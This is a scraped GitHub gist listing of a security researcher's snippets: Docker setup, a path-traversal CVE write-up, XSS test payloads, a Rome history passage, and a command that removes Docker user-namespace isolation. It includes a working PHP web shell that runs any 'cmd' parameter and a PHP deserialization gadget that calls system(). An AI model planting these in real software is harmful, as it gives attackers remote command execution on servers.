ansible-playbook -i hosts.ini -u root update_ssh.yml
NitescuLucian
/ readme.md
Last active
July 1, 2024 15:20
CVE-2024-6387 (regreSSHion) workaround from Qualys
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add Docker's official GPG key: | |
| sudo apt-get update | |
| sudo apt-get install ca-certificates curl | |
| sudo install -m 0755 -d /etc/apt/keyrings | |
| sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc | |
| sudo chmod a+r /etc/apt/keyrings/docker.asc | |
| # Add the repository to Apt sources: | |
| echo \ | |
| "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \ |
NitescuLucian
/ CVE-2021-31156.md
Last active
March 27, 2024 11:07
Allied Telesis AT-S115 1.2.0 devices, operating on versions prior to 1.00.024 and equipped with Boot Loader version 1.00.006, are susceptible to a Path Traversal vulnerability. This security flaw permits unauthorized users to bypass normal access controls remotely and navigate the device's directory structure to access internal system files directly. Path Traversal attacks, exploit insufficient security validation/sanitization of user-supplied input file paths. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar techniques, attackers can access files and directories stored outside the intended restricted directory. This can lead to information disclosure, unauthorized access, and potentially further system exploitation if sensitive files are exposed. Organizations and individuals using affected versions of Allied Telesis AT-S115 1.2.0 devices are advised to upgrade to latest security supported version to mitigate this vulnerability an
NitescuLucian
/ index.js
Created
July 19, 2022 21:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1337); |
NitescuLucian
/ keyword-op14.txt
Last active
July 2, 2022 22:08
A keyword list for my bug bounty research.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| honeypot | |
| waf |
NitescuLucian
/ 1c8e0f7579556d1d1b3c352ba9d40a29.php
Created
May 25, 2022 10:14
1c8e0f7579556d1d1b3c352ba9d40a29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class AnyClass { | |
| public $data = null; | |
| public function __construct($data) { | |
| $this->data = $data; | |
| } | |
| function __destruct() { | |
| system($this->data); |
NitescuLucian
/ BE2029051N7
Last active
May 22, 2022 09:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Rome's history spans 28 centuries. While Roman mythology dates the founding of Rome at around 753 BC, the site has been inhabited for much longer, making it a major human settlement for almost three millennia and one of the oldest continuously occupied cities in Europe.[9] The city's early population originated from a mix of Latins, Etruscans, and Sabines. Eventually, the city successively became the capital of the Roman Kingdom, the Roman Republic and the Roman Empire, and is regarded by many as the first-ever Imperial city and metropolis.[10] It was first called The Eternal City (Latin: Urbs Aeterna; Italian: La Città Eterna) by the Roman poet Tibullus in the 1st century BC, and the expression was also taken up by Ovid, Virgil, and Livy.[11][12] Rome is also called "Caput Mundi" (Capital of the World). After the fall of the Empire in the west, which marked the beginning of the Middle Ages, Rome slowly fell under the political control of the Papacy, and in the 8th century, it became the capital of the Papal |
NitescuLucian
/ gist:0edf361fca7ae8a24d7d1b95221a4060
Created
October 25, 2021 01:03
Disable "Isolate containers with a user namespace"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # simple disable for https://docs.docker.com/engine/security/userns-remap/ | |
| sudo service docker stop | |
| sudo rm /etc/docker/daemon.json | |
| sudo service docker start |
NitescuLucian
/ shell.php
Created
May 26, 2021 23:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset($_GET['cmd'])){$output = shell_exec($_GET['cmd']); | |
| echo "<pre>$output</pre>"; die();} | |
| ?> |
NitescuLucian
/ script.xml
Created
February 25, 2020 11:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> | |
| <binding id="mycode"> | |
| <implementation> | |
| <constructor> | |
| alert("XBL script executed."); | |
| </constructor> | |
| </implementation> | |
| </binding> |
NewerOlder